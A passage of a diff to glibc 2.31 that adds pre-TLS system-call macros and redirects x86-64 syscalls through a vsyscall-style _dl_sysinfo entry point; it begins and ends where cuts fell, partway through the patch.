2020-02-01 12:52:50.000000000 +0100 125 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/read_nocancel.c 2022-01-26 20:43:00.585760504 +0100 126 | @@ -23,6 +23,8 @@ 127 | ssize_t 128 | __read_nocancel (int fd, void *buf, size_t nbytes) 129 | { 130 | - return INLINE_SYSCALL_CALL (read, fd, buf, nbytes); 131 | +// return pre_tls_syscall3(SYS_ify(read), , fd, buf, nbytes); 132 | +// return INLINE_SYSCALL_CALL (read, fd, buf, nbytes); 133 | + return PRE_TLS_INLINE_SYSCALL (read, 3, fd, buf, nbytes); 134 | } 135 | hidden_def (__read_nocancel) 136 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/wordsize-64/fxstat.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/wordsize-64/fxstat.c 137 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/wordsize-64/fxstat.c 2020-02-01 12:52:50.000000000 +0100 138 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/wordsize-64/fxstat.c 2022-01-26 21:24:28.143883242 +0100 139 | @@ -32,7 +32,8 @@ 140 | __fxstat (int vers, int fd, struct stat *buf) 141 | { 142 | if (vers == _STAT_VER_KERNEL || vers == _STAT_VER_LINUX) 143 | - return INLINE_SYSCALL (fstat, 2, fd, buf); 144 | + //return INLINE_SYSCALL (fstat, 2, fd, buf); 145 | + return PRE_TLS_INLINE_SYSCALL (fstat, 2, fd, buf); 146 | 147 | __set_errno (EINVAL); 148 | return -1; 149 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/wordsize-64/xstat.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/wordsize-64/xstat.c 150 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/wordsize-64/xstat.c 2020-02-01 12:52:50.000000000 +0100 151 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/wordsize-64/xstat.c 2022-01-26 21:15:04.803019004 +0100 152 | @@ -32,7 +32,8 @@ 153 | __xstat (int vers, const char *name, struct stat *buf) 154 | { 155 | if (vers == _STAT_VER_KERNEL || vers == _STAT_VER_LINUX) 156 | - return INLINE_SYSCALL (stat, 2, name, buf); 157 | +// return INLINE_SYSCALL (stat, 2, name, buf); 158 | + return PRE_TLS_INLINE_SYSCALL(stat, 2, name, buf); 159 | 160 | __set_errno (EINVAL); 161 | return -1; 162 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86/cpu-features.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86/cpu-features.c 163 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86/cpu-features.c 2020-02-01 12:52:50.000000000 +0100 164 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86/cpu-features.c 2022-01-26 20:38:57.690226355 +0100 165 | @@ -25,8 +25,10 @@ 166 | { 167 | unsigned long long cet_status[3]; 168 | INTERNAL_SYSCALL_DECL (err); 169 | - if (INTERNAL_SYSCALL (arch_prctl, err, 2, ARCH_CET_STATUS, 170 | - cet_status) == 0) 171 | +// if (INTERNAL_SYSCALL (arch_prctl, err, 2, ARCH_CET_STATUS, cet_status) == 0) 172 | +// if(pre_tls_syscall2(SYS_ify(arch_prctl), err, ARCH_CET_STATUS, cet_status) == 0) 173 | + if (PRE_TLS_INTERNAL_SYSCALL (arch_prctl, err, 2, ARCH_CET_STATUS, cet_status) == 0) 174 | + 175 | return cet_status[0]; 176 | return 0; 177 | } 178 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/brk.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/brk.c 179 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/brk.c 2020-02-01 12:52:50.000000000 +0100 180 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/brk.c 2022-01-26 20:38:05.970333056 +0100 181 | @@ -20,6 +20,7 @@ 182 | #include 183 | #include 184 | 185 | + 186 | /* This must be initialized data because commons can't have aliases. */ 187 | void *__curbrk = 0; 188 | 189 | @@ -28,7 +29,10 @@ 190 | { 191 | void *newbrk; 192 | 193 | - __curbrk = newbrk = (void *) INLINE_SYSCALL (brk, 1, addr); 194 | + //__curbrk = newbrk = (void *) INLINE_SYSCALL (brk, 1, addr); 195 | + //__curbrk = newbrk = (void *) pre_tls_syscall1(SYS_ify(brk), , addr); 196 | + __curbrk = newbrk = (void *) PRE_TLS_INLINE_SYSCALL (brk, 1, addr); 197 | + 198 | 199 | if (newbrk < addr) 200 | { 201 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/clone.S glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/clone.S 202 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/clone.S 2020-02-01 12:52:50.000000000 +0100 203 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/clone.S 2022-01-26 10:36:51.000000000 +0100 204 | @@ -56,13 +56,23 @@ 205 | jz SYSCALL_ERROR_LABEL 206 | 207 | /* Insert the argument onto the new stack. */ 208 | +#ifdef X86_64_USE_VSYSCALL 209 | + subq $24,%rsi 210 | + movq %rcx,16(%rsi) 211 | +#else 212 | subq $16,%rsi 213 | movq %rcx,8(%rsi) 214 | +#endif 215 | 216 | /* Save the function pointer. It will be popped off in the 217 | child in the ebx frobbing below. */ 218 | +#ifdef X86_64_USE_VSYSCALL 219 | + movq %rdi,8(%rsi) 220 | + leaq L(enter_kernel_end)(%rip),%r10 221 | + movq %r10,0(%rsi) 222 | +#else 223 | movq %rdi,0(%rsi) 224 | - 225 | +#endif 226 | /* Do the system call. */ 227 | movq %rdx, %rdi 228 | movq %r8, %rdx 229 | @@ -73,8 +83,9 @@ 230 | /* End FDE now, because in the child the unwind info will be 231 | wrong. */ 232 | cfi_endproc; 233 | - syscall 234 | - 235 | + ENTER_KERNEL 236 | + 237 | +L(enter_kernel_end): 238 | testq %rax,%rax 239 | jl SYSCALL_ERROR_LABEL 240 | jz L(thread_start) 241 | @@ -96,7 +107,7 @@ 242 | /* Call exit with return value from function call. */ 243 | movq %rax, %rdi 244 | movl $SYS_ify(exit), %eax 245 | - syscall 246 | + ENTER_KERNEL 247 | cfi_endproc; 248 | 249 | cfi_startproc; 250 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/dl-sysdep.h glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/dl-sysdep.h 251 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/dl-sysdep.h 1970-01-01 01:00:00.000000000 +0100 252 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/dl-sysdep.h 2022-01-25 13:58:56.000000000 +0100 253 | @@ -0,0 +1,52 @@ 254 | +/* System-specific settings for dynamic linker code. IA-64 version. 255 | + Copyright (C) 2003-2020 Free Software Foundation, Inc. 256 | + This file is part of the GNU C Library. 257 | + 258 | + The GNU C Library is free software; you can redistribute it and/or 259 | + modify it under the terms of the GNU Lesser General Public 260 | + License as published by the Free Software Foundation; either 261 | + version 2.1 of the License, or (at your option) any later version. 262 | + 263 | + The GNU C Library is distributed in the hope that it will be useful, 264 | + but WITHOUT ANY WARRANTY; without even the implied warranty of 265 | + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 266 | + Lesser General Public License for more details. 267 | + 268 | + You should have received a copy of the GNU Lesser General Public 269 | + License along with the GNU C Library; if not, see 270 | + . */ 271 | + 272 | +#ifndef _LINUX_X86_64_DL_SYSDEP_H 273 | +#define _LINUX_X86_64_DL_SYSDEP_H 1 274 | + 275 | +#include_next 276 | + 277 | +/* Traditionally system calls have been made using break 0x100000. A 278 | + second method was introduced which, if possible, will use the EPC 279 | + instruction. To signal the presence and where to find the code the 280 | + kernel passes an AT_SYSINFO_EHDR pointer in the auxiliary vector to 281 | + the application. */ 282 | +#define NEED_DL_SYSINFO 1 283 | +#define USE_DL_SYSINFO 1 284 | + 285 | +#if defined NEED_DL_SYSINFO && !defined __ASSEMBLER__ 286 | +extern void _dl_sysinfo_syscall (void) attribute_hidden; 287 | +# define DL_SYSINFO_DEFAULT (uintptr_t) _dl_sysinfo_syscall 288 | +# define DL_SYSINFO_IMPLEMENTATION \ 289 | + asm (".text\n\t" \ 290 | + ".type _dl_sysinfo_syscall,@function\n\t" \ 291 | + ".hidden _dl_sysinfo_syscall\n" \ 292 | + CFI_STARTPROC "\n" \ 293 | + "_dl_sysinfo_syscall:\n\t" \ 294 | + "syscall;\n\t" \ 295 | + "ret;\n\t" \ 296 | + CFI_ENDPROC "\n" \ 297 | + ".size _dl_sysinfo_syscall,.-_dl_sysinfo_syscall\n\t" \ 298 | + ".previous"); 299 | +#endif 300 | + 301 | +/* _dl_argv cannot be attribute_relro, because _dl_start_user 302 | + might write into it after _dl_start returns. */ 303 | +#define DL_ARGV_NOT_RELRO 1 304 | + 305 | +#endif /* dl-sysdep.h */ 306 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/getcontext.S glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/getcontext.S 307 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/getcontext.S 2020-02-01 12:52:50.000000000 +0100 308 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/getcontext.S 2022-01-26 10:37:59.000000000 +0100 309 | @@ -73,7 +73,7 @@ 310 | mov %RSP_LP, %RSI_LP 311 | movl $ARCH_CET_STATUS, %edi 312 | movl $__NR_arch_prctl, %eax 313 | - syscall 314 | + ENTER_KERNEL 315 | testq %rax, %rax 316 | jz L(continue_no_err) 317 | 318 | @@ -125,7 +125,7 @@ 319 | #endif 320 | movl $_NSIG8,%r10d 321 | movl $__NR_rt_sigprocmask, %eax 322 | - syscall 323 | + ENTER_KERNEL 324 | cmpq $-4095, %rax /* Check %rax for error. */ 325 | jae SYSCALL_ERROR_LABEL /* Jump to error handler if error. */ 326 | 327 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/setcontext.S glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/setcontext.S 328 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/setcontext.S 2020-02-01 12:52:50.000000000 +0100 329 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/setcontext.S 2022-01-26 10:38:30.000000000 +0100 330 | @@ -44,7 +44,7 @@ 331 | movl $SIG_SETMASK, %edi 332 | movl $_NSIG8,%r10d 333 | movl $__NR_rt_sigprocmask, %eax 334 | - syscall 335 | + ENTER_KERNEL 336 | /* Pop the pointer into RDX. The choice is arbitrary, but 337 | leaving RDI and RSI available for use later can avoid 338 | shuffling values. */ 339 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/sigaction.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/sigaction.c 340 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/sigaction.c 2020-02-01 12:52:50.000000000 +0100 341 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/sigaction.c 2022-01-26 10:42:05.000000000 +0100 342 | @@ -32,6 +32,17 @@ 343 | 344 | #include 345 | 346 | +#ifdef X86_64_USE_VSYSCALL 347 | +# ifdef SHARED 348 | +/* XXX : SYSINFO_OFFSET is hard-coded here! */ 349 | +# define ENTER_KERNEL_NO_RETURN "jmp *%fs:0x20" 350 | +# else 351 | +# define ENTER_KERNEL_NO_RETURN "jmp *_dl_sysinfo" 352 | +# endif 353 | +#else 354 | +# define ENTER_KERNEL_NO_RETURN "syscall" 355 | +#endif 356 | + 357 | /* NOTE: Please think twice before making any changes to the bits of 358 | code below. GDB needs some intimate knowledge about it to 359 | recognize them as signal trampolines, and make backtraces through 360 | @@ -78,7 +89,7 @@ 361 | " .type __" #name ",@function\n" \ 362 | "__" #name ":\n" \ 363 | " movq $" #syscall ", %rax\n" \ 364 | - " syscall\n" \ 365 | + ENTER_KERNEL_NO_RETURN "\n" \ 366 | ".LEND_" #name ":\n" \ 367 | ".section .eh_frame,\"a\",@progbits\n" \ 368 | ".LSTARTFRAME_" #name ":\n" \ 369 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/swapcontext.S glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/swapcontext.S 370 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/swapcontext.S 2020-02-01 12:52:50.000000000 +0100 371 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/swapcontext.S 2022-01-26 10:42:54.000000000 +0100 372 | @@ -77,7 +77,7 @@ 373 | movl $SIG_SETMASK, %edi 374 | movl $_NSIG8,%r10d 375 | movl $__NR_rt_sigprocmask, %eax 376 | - syscall 377 | + ENTER_KERNEL 378 | cmpq $-4095, %rax /* Check %rax for error. */ 379 | jae SYSCALL_ERROR_LABEL /* Jump to error handler if error. */ 380 | 381 | @@ -117,7 +117,7 @@ 382 | mov %RSP_LP, %RSI_LP 383 | movl $ARCH_CET_STATUS, %edi 384 | movl $__NR_arch_prctl, %eax 385 | - syscall 386 | + ENTER_KERNEL 387 | testq %rax, %rax 388 | jz L(continue_no_err) 389 | 390 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/syscall.S glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/syscall.S 391 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/syscall.S 2020-02-01 12:52:50.000000000 +0100 392 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/syscall.S 2022-01-26 10:43:20.000000000 +0100 393 | @@ -34,7 +34,7 @@ 394 | movq %r8, %r10 395 | movq %r9, %r8 396 | movq 8(%rsp),%r9 /* arg6 is on the stack. */ 397 | - syscall /* Do the system call. */ 398 | + ENTER_KERNEL /* Do the system call. */ 399 | cmpq $-4095, %rax /* Check %rax for error. */ 400 | jae SYSCALL_ERROR_LABEL /* Jump to error handler if error. */ 401 | ret /* Return to caller. */ 402 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/sysdep.h glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/sysdep.h 403 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/sysdep.h 2020-02-01 12:52:50.000000000 +0100 404 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/sysdep.h 2022-01-28 16:03:14.328601531 +0100 405 | @@ -33,6 +33,13 @@ 406 | #undef SYS_ify 407 | #define SYS_ify(syscall_name) __NR_##syscall_name 408 | 409 | +#if defined USE_DL_SYSINFO \ 410 | + && (!defined NOT_IN_libc || defined IS_IN_libpthread) 411 | +# define X86_64_USE_VSYSCALL 1 412 | +#else 413 | +# undef X86_64_USE_VSYSCALL 414 | +#endif 415 | + 416 | /* This is to help the old kernel headers where __NR_semtimedop is not 417 | available. */ 418 | #ifndef __NR_semtimedop 419 | @@ -74,6 +81,21 @@ 420 | SYSCALL_ERROR_HANDLER \ 421 | END (name) 422 | 423 | +# undef PRE_TLS_PSEUDO 424 | +# define PRE_TLS_PSEUDO(name, syscall_name, args) \ 425 | + .text; \ 426 | + ENTRY (name) \ 427 | + PRE_TLS_DO_CALL (syscall_name, args); \ 428 | + cmpq $-4095, %rax; \ 429 | + jae SYSCALL_ERROR_LABEL 430 | + 431 | + 432 | +# undef PRE_TLS_DO_CALL 433 | +# define PRE_TLS_DO_CALL(syscall_name, args) \ 434 | + DOARGS_##args \ 435 | + movl $SYS_ify (syscall_name), %eax; \ 436 | + syscall; 437 | + 438 | # undef PSEUDO_NOERRNO 439 | # define PSEUDO_NOERRNO(name, syscall_name, args) \ 440 | .text; \ 441 | @@ -126,6 +148,18 @@ 442 | ret; 443 | # endif /* PIC */ 444 | 445 | +/* The original calling convention for system calls on Linux/x86-64 is 446 | + to use syscall. */ 447 | +#ifdef X86_64_USE_VSYSCALL 448 | +# ifdef SHARED 449 | +# define ENTER_KERNEL call *%fs:SYSINFO_OFFSET 450 | +# else 451 | +# define ENTER_KERNEL call *_dl_sysinfo 452 | +# endif 453 | +#else 454 | +# define ENTER_KERNEL syscall 455 | +#endif 456 | + 457 | /* The Linux/x86-64 kernel expects the system call parameters in 458 | registers according to the following table: 459 | 460 | @@ -162,11 +196,13 @@ 461 | 462 | Syscalls of more than 6 arguments are not supported. */ 463 | 464 | +// fcg: this should be ENTER_KERNEL 465 | + 466 | # undef DO_CALL 467 | # define DO_CALL(syscall_name, args) \ 468 | DOARGS_##args \ 469 | movl $SYS_ify (syscall_name), %eax; \ 470 | - syscall; 471 | + ENTER_KERNEL; 472 | 473 | # define DOARGS_0 /* nothing */ 474 | # define DOARGS_1 /* nothing */ 475 | @@ -177,6 +213,18 @@ 476 | # define DOARGS_6 DOARGS_5 477 | 478 | #else /* !__ASSEMBLER__ */ 479 | + 480 | +#ifdef X86_64_USE_VSYSCALL 481 | +# ifdef SHARED 482 | +/* XXX : SYSINFO_OFFSET is hard-coded here! */ 483 | +# define STR_ENTER_KERNEL "call *%%fs:0x20" 484 | +# else 485 | +# define STR_ENTER_KERNEL "call *_dl_sysinfo" 486 | +# endif 487 | +#else 488 | +# define STR_ENTER_KERNEL "syscall" 489 | +#endif 490 | + 491 | /* Define a macro which expands inline into the wrapper code for a system 492 | call. */ 493 | # undef INLINE_SYSCALL 494 | @@ -225,6 +273,394 @@ 495 | #define INTERNAL_SYSCALL_NCS(number, err, nr, args...) \ 496 | internal_syscall##nr (number, err, args) 497 | 498 | +// fcg: macros for syscalls before TLS is set up 499 | +# undef PRE_TLS_INLINE_SYSCALL 500 | +# define PRE_TLS_INLINE_SYSCALL(name, nr, args...) \ 501 | + ({ \ 502 | + unsigned long int resultvar = PRE_TLS_INTERNAL_SYSCALL (name, , nr, args); \ 503 | + if (__glibc_unlikely (INTERNAL_SYSCALL_ERROR_P (resultvar, ))) \ 504 | + { \ 505 | + __set_errno (INTERNAL_SYSCALL_ERRNO (resultvar, )); \ 506 | + resultvar = (unsigned long int) -1; \ 507 | + } \ 508 | + (long int) resultvar; }) 509 | + 510 | +#undef PRE_TLS_INTERNAL_SYSCALL 511 | +#define PRE_TLS_INTERNAL_SYSCALL(name, err, nr, args...) \ 512 | + pre_tls_syscall##nr (SYS_ify (name), err, args) 513 | + 514 | +#undef pre_tls_syscall1 515 | +#define pre_tls_syscall1(number, err, arg1) \ 516 | +({ \ 517 | + unsigned long int resultvar; \ 518 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 519 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 520 | + asm volatile ( \ 521 | + "syscall\n\t" \ 522 | + : "=a" (resultvar) \ 523 | + : "0" (number), "r" (_a1) \ 524 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 525 | + (long int) resultvar; \ 526 | +}) 527 | +#undef pre_tls_syscall2 528 | +#define pre_tls_syscall2(number, err, arg1, arg2) \ 529 | +({ \ 530 | + unsigned long int resultvar; \ 531 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 532 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 533 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 534 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 535 | + asm volatile ( \ 536 | + "syscall\n\t" \ 537 | + : "=a" (resultvar) \ 538 | + : "0" (number), "r" (_a1), "r" (_a2) \ 539 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 540 | + (long int) resultvar; \ 541 | +}) 542 | +#undef pre_tls_syscall4 543 | +#define pre_tls_syscall4(number, err, arg1, arg2, arg3, arg4) \ 544 | +({ \ 545 | + unsigned long int resultvar; \ 546 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 547 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 548 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 549 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 550 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 551 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 552 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 553 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 554 | + asm volatile ( \ 555 | + "syscall\n\t" \ 556 | + : "=a" (resultvar) \ 557 | + : "0" (number), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4) \ 558 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 559 | + (long int) resultvar; \ 560 | +}) 561 | +#undef pre_tls_syscall3 562 | +#define pre_tls_syscall3(number, err, arg1, arg2, arg3) \ 563 | +({ \ 564 | + unsigned long int resultvar; \ 565 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 566 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 567 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 568 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 569 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 570 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 571 | + asm volatile ( \ 572 | + "syscall\n\t" \ 573 | + : "=a" (resultvar) \ 574 | + : "0" (number), "r" (_a1), "r" (_a2), "r" (_a3) \ 575 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 576 | + (long int) resultvar; \ 577 | +}) 578 | +#undef pre_tls_syscall5 579 | +#define pre_tls_syscall5(number, err, arg1, arg2, arg3, arg4, arg5) \ 580 | +({ \ 581 | + unsigned long int resultvar; \ 582 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 583 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 584 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 585 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 586 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 587 | + register TYPEFY (arg5, _a5) asm ("r8") = __arg5; \ 588 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 589 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 590 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 591 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 592 | + asm volatile ( \ 593 | + "syscall\n\t" \ 594 | + : "=a" (resultvar) \ 595 | + : "0" (number), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 596 | + "r" (_a5) \ 597 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 598 | + (long int) resultvar; \ 599 | +}) 600 | + 601 | +#undef pre_tls_syscall6 602 | +#define pre_tls_syscall6(number, err, arg1, arg2, arg3, arg4, arg5, arg6) \ 603 | +({ \ 604 | + unsigned long int resultvar; \ 605 | + TYPEFY (arg6, __arg6) = ARGIFY (arg6); \ 606 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 607 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 608 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 609 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 610 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 611 | + register TYPEFY (arg6, _a6) asm ("r9") = __arg6; \ 612 | + register TYPEFY (arg5, _a5) asm ("r8") = __arg5; \ 613 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 614 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 615 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 616 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 617 | + asm volatile ( \ 618 | + "syscall\n\t" \ 619 | + : "=a" (resultvar) \ 620 | + : "0" (number), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 621 | + "r" (_a5), "r" (_a6) \ 622 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 623 | + (long int) resultvar; \ 624 | +}) 625 | + 626 | +// fcg: // for now, disable non-shared call to _dl_sysinfo 627 | +# if defined X86_64_USE_VSYSCALL && defined SHARED 628 | +//# ifdef SHARED 629 | +#undef internal_syscall0 630 | +#define internal_syscall0(number, err, dummy...) \ 631 | +({ \ 632 | + unsigned long int resultvar; \ 633 | + asm volatile ( \ 634 | + "call *%%fs:%P2\n\t" \ 635 | + : "=a" (resultvar) \ 636 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)) \ 637 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 638 | + (long int) resultvar; \ 639 | +}) 640 | + 641 | +#undef internal_syscall1 642 | +#define internal_syscall1(number, err, arg1) \ 643 | +({ \ 644 | + unsigned long int resultvar; \ 645 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 646 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 647 | + asm volatile ( \ 648 | + "call *%%fs:%P2\n\t" \ 649 | + : "=a" (resultvar) \ 650 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1) \ 651 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 652 | + (long int) resultvar; \ 653 | +}) 654 | + 655 | +#undef internal_syscall2 656 | +#define internal_syscall2(number, err, arg1, arg2) \ 657 | +({ \ 658 | + unsigned long int resultvar; \ 659 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 660 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 661 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 662 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 663 | + asm volatile ( \ 664 | + "call *%%fs:%P2\n\t" \ 665 | + : "=a" (resultvar) \ 666 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2) \ 667 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 668 | + (long int) resultvar; \ 669 | +}) 670 | + 671 | +#undef internal_syscall3 672 | +#define internal_syscall3(number, err, arg1, arg2, arg3) \ 673 | +({ \ 674 | + unsigned long int resultvar; \ 675 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 676 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 677 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 678 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 679 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 680 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 681 | + asm volatile ( \ 682 | + "call *%%fs:%P2\n\t" \ 683 | + : "=a" (resultvar) \ 684 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3) \ 685 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 686 | + (long int) resultvar; \ 687 | +}) 688 | + 689 | +#undef internal_syscall4 690 | +#define internal_syscall4(number, err, arg1, arg2, arg3, arg4) \ 691 | +({ \ 692 | + unsigned long int resultvar; \ 693 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 694 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 695 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 696 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 697 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 698 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 699 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 700 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 701 | + asm volatile ( \ 702 | + "call *%%fs:%P2\n\t" \ 703 | + : "=a" (resultvar) \ 704 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4) \ 705 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 706 | + (long int) resultvar; \ 707 | +}) 708 | + 709 | +#undef internal_syscall5 710 | +#define internal_syscall5(number, err, arg1, arg2, arg3, arg4, arg5) \ 711 | +({ \ 712 | + unsigned long int resultvar; \ 713 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 714 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 715 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 716 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 717 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 718 | + register TYPEFY (arg5, _a5) asm ("r8") = __arg5; \ 719 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 720 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 721 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 722 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 723 | + asm volatile ( \ 724 | + "call *%%fs:%P2\n\t" \ 725 | + : "=a" (resultvar) \ 726 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 727 | + "r" (_a5) \ 728 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 729 | + (long int) resultvar; \ 730 | +}) 731 | + 732 | +#undef internal_syscall6 733 | +#define internal_syscall6(number, err, arg1, arg2, arg3, arg4, arg5, arg6) \ 734 | +({ \ 735 | + unsigned long int resultvar; 